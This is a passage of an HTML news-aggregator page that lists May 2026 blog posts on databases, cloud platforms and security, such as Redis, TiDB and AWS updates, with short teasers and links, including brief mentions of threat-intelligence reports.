          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A few months back I wrote two pieces about what infrastructure agents actually need: One on the database trends shaping 2026, another on why agents are the new database users. The arguments stayed mos</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/agent-database-kimi-k2-6/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-key-value-is-misleading-access-patterns-are-key" class="group relative scroll-mt-24">
        <a href="#h3-key-value-is-misleading-access-patterns-are-key" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 “Key-Value” is Misleading. Access Patterns are Key.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-key-value-is-misleading-access-patterns-are-key"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Access patterns determine your data model, your I/O costs, and which database is the best fit for your workload</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/05/14/access-patterns-are-key/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-context-engineering-for-ai-what-it-is-how-to-build-it" class="group relative scroll-mt-24">
        <a href="#h3-context-engineering-for-ai-what-it-is-how-to-build-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Context engineering for AI: what it is & how to build it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-context-engineering-for-ai-what-it-is-how-to-build-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Your support agent confidently tells a customer they qualify for a refund under a 60-day return policy. Your actual policy is 30 days. The agent hallucinated the longer window, and the easy reaction i</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/context-engineering-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-to-tame-the-thundering-herd-problem" class="group relative scroll-mt-24">
        <a href="#h3-how-to-tame-the-thundering-herd-problem" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How to tame the thundering herd problem
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-to-tame-the-thundering-herd-problem"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The thundering herd problem occurs when multiple processes or clients repeatedly request the same resource simultaneously, leading to excessive load and performance degradation. If you grew up on clas</p>
<p><strong>📅 May 13, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/how-to-tame-the-thundering-herd-problem/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-tidb-scaile-europe-2026-speaker-lineup-and-session-preview" class="group relative scroll-mt-24">
        <a href="#h3-tidb-scaile-europe-2026-speaker-lineup-and-session-preview" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 TiDB SCaiLE Europe 2026: Speaker Lineup and Session Preview
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-tidb-scaile-europe-2026-speaker-lineup-and-session-preview"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Agentic AI changes the database problem. A single user action can trigger many agent steps. However, each agent needs state, memory, transactions, analytics, and retrieval to stay consistent under rea</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/tidb-scaile-europe-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-new-research-on-cloud-database-trends-technical-risks-cost-pressures-and-migration-triggers" class="group relative scroll-mt-24">
        <a href="#h3-new-research-on-cloud-database-trends-technical-risks-cost-pressures-and-migration-triggers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 New Research on Cloud Database Trends: Technical Risks, Cost Pressures, and Migration Triggers
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-new-research-on-cloud-database-trends-technical-risks-cost-pressures-and-migration-triggers"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Good enough until it isn’t: the database complacency trap</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/05/12/new-research-on-cloud-database-trends/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-shopping-assistants-how-they-work-what-to-build" class="group relative scroll-mt-24">
        <a href="#h3-ai-shopping-assistants-how-they-work-what-to-build" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI shopping assistants: how they work & what to build
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-shopping-assistants-how-they-work-what-to-build"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>You type &quot;cozy winter sweater&quot; into a search bar and get zero results because no product is tagged with that exact phrase. Keyword search can&#39;t tell that a &quot;wool pullover&quot; is the same idea. AI shoppin</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/ai-shopping-assistant/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-dynamic-endpoints-migrate-databases-without-changing-your-endpoint" class="group relative scroll-mt-24">
        <a href="#h3-dynamic-endpoints-migrate-databases-without-changing-your-endpoint" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Dynamic endpoints: Migrate databases without changing your endpoint
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-dynamic-endpoints-migrate-databases-without-changing-your-endpoint"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Most teams don’t move Redis databases often. But when they do, the complexity is rarely in Redis itself. It’s in coordinating endpoint changes across apps, services, and jobs. Redis Cloud now supports</p>
<p><strong>📅 May 12, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/dynamic-endpoints-migrate-databases-without-changing-your-endpoint/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-preview-to-production-tidb-cloud-dedicated-on-microsoft-azure-is-now-generally-available" class="group relative scroll-mt-24">
        <a href="#h3-from-preview-to-production-tidb-cloud-dedicated-on-microsoft-azure-is-now-generally-available" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From Preview to Production: TiDB Cloud Dedicated on Microsoft Azure is Now Generally Available
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-preview-to-production-tidb-cloud-dedicated-on-microsoft-azure-is-now-generally-available"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>For teams standardized on Azure, distributed SQL has been a tradeoff. Stay on managed SQL Server or Azure Database for MySQL and live with single-instance scale ceilings. Step outside Azure to get hor</p>
<p><strong>📅 May 11, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/tidb-cloud-dedicated-ga-microsoft-azure/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-oracle-of-delphi-will-steal-your-credentials"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South-Africa and hosted by Volum</p>
<p><strong>📅 May 18, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-emr-serverless-is-now-available-in-additional-aws-regions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-emr-serverless-is-now-available-in-additional-aws-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon EMR Serverless is now available in additional AWS Regions
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-emr-serverless-is-now-available-in-additional-aws-regions"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon EMR Serverless is now generally available in six additional AWS Regions - Asia Pacific (Hyderabad), Asia Pacific (Malaysia), Asia Pacific (New Zealand), Asia Pacific (Taipei), Asia Pacific (Tha</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/amazon-emr-serverless-aws-regions/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-aws-partner-central-agents-now-accelerates-opportunity-creation" class="group relative scroll-mt-24">
        <a href="#h3-aws-partner-central-agents-now-accelerates-opportunity-creation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AWS Partner Central agents now accelerates opportunity creation
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-aws-partner-central-agents-now-accelerates-opportunity-creation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Today, AWS announces that the AWS Partner Central agents now accelerate opportunity creation through natural language conversation. AWS Partner Central agents, released on March 16, 2026, are AI-power</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/aws-partner-central-agents-oppo"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-connect-cases-now-lets-you-edit-related-items-and-delete-cases-from-the-agent-workspace" class="group relative scroll-mt-24">
        <a href="#h3-amazon-connect-cases-now-lets-you-edit-related-items-and-delete-cases-from-the-agent-workspace" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon Connect Cases now lets you edit related items and delete cases from the agent workspace
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-connect-cases-now-lets-you-edit-related-items-and-delete-cases-from-the-agent-workspace"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon Connect Cases now supports editing and deleting related items, and deleting cases directly from the agent workspace without administrator help. Agents can update comments, unlink contacts assoc</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/amazon-connect-cases-related-item/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gemini-live-agent-challenge-announcing-the-winners-and-highlights" class="group relative scroll-mt-24">
        <a href="#h3-gemini-live-agent-challenge-announcing-the-winners-and-highlights" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Gemini Live Agent Challenge: Announcing the winners and highlights
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gemini-live-agent-challenge-announcing-the-winners-and-highlights"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The Gemini Live Agent Challenge is officially in the books! We challenged developers worldwide to break out of the traditional &#39;text box&#39; paradigm by building next-generation AI agents. From our initi</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/developers-practitioners/winners-and-highlights-of-the-gemini-live-agent-challenge/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-welcome-to-blackfile-inside-a-vishing-extortion-operation" class="group relative scroll-mt-24">
        <a href="#h3-welcome-to-blackfile-inside-a-vishing-extortion-operation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Welcome to BlackFile: Inside a Vishing Extortion Operation
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-welcome-to-blackfile-inside-a-vishing-extortion-operation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Written by: Austin Larsen, Tyler McLellan, Genevieve Stark, Dan Ebreo Introduction Google Threat Intelligence Group (GTIG) has continued to track an expansive extortion campaign by UNC6671, a threat a</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/blackfile-vishing-extortion-operation/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-friday-five-may-15-2026" class="group relative scroll-mt-24">
        <a href="#h3-friday-five-may-15-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Friday Five — May 15, 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-friday-five-may-15-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Catch up on the news at Red Hat Summit 2026This definitive guide to all of Red Hat&#39;s news offers a centralized view of the latest product innovations, strategic collaborations, and visionary milestone</p>
<p><strong>📅 May 15, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/friday-five-may-15-2026-red-hat"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-sap-hana-performance-insights-from-aws-intel-and-suse" class="group relative scroll-mt-24">
        <a href="#h3-scaling-sap-hana-performance-insights-from-aws-intel-and-suse" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling SAP HANA Performance: Insights from AWS, Intel, and SUSE
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-scaling-sap-hana-performance-insights-from-aws-intel-and-suse"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Most SAP teams know they need to move to the cloud. The hesitation isn’t about whether they should, it’s about what happens to performance when you get there. On-premises SAP HANA appliances are predi</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/scaling-sap-hana-performance-insights-from-aws-intel-and-suse/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-may-patches-for-azure-devops-server" class="group relative scroll-mt-24">
        <a href="#h3-may-patches-for-azure-devops-server" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 May Patches for Azure DevOps Server
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-may-patches-for-azure-devops-server"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We are releasing new patches for our self‑hosted product, Azure DevOps Server. We strongly recommend that all customers stay up to date with the latest, most secure version of Azure DevOps Server. The</p>
<p><strong>📅 May 14, 2026</strong> • <strong>📰 Azure DevOps Blog</strong></p>
<p><a href="https://devblogs.microsoft.com/devops/may-patches-for-azure-devops-server-3/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cloud-ciso-perspectives-how-google-wiz-changes-multicloud-strategy-for-cisos" class="group relative scroll-mt-24">
        <a href="#h3-cloud-ciso-perspectives-how-google-wiz-changes-multicloud-strategy-for-cisos" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cloud CISO Perspectives: How Google + Wiz changes multicloud strategy for CISOs
        </a>
        <button 
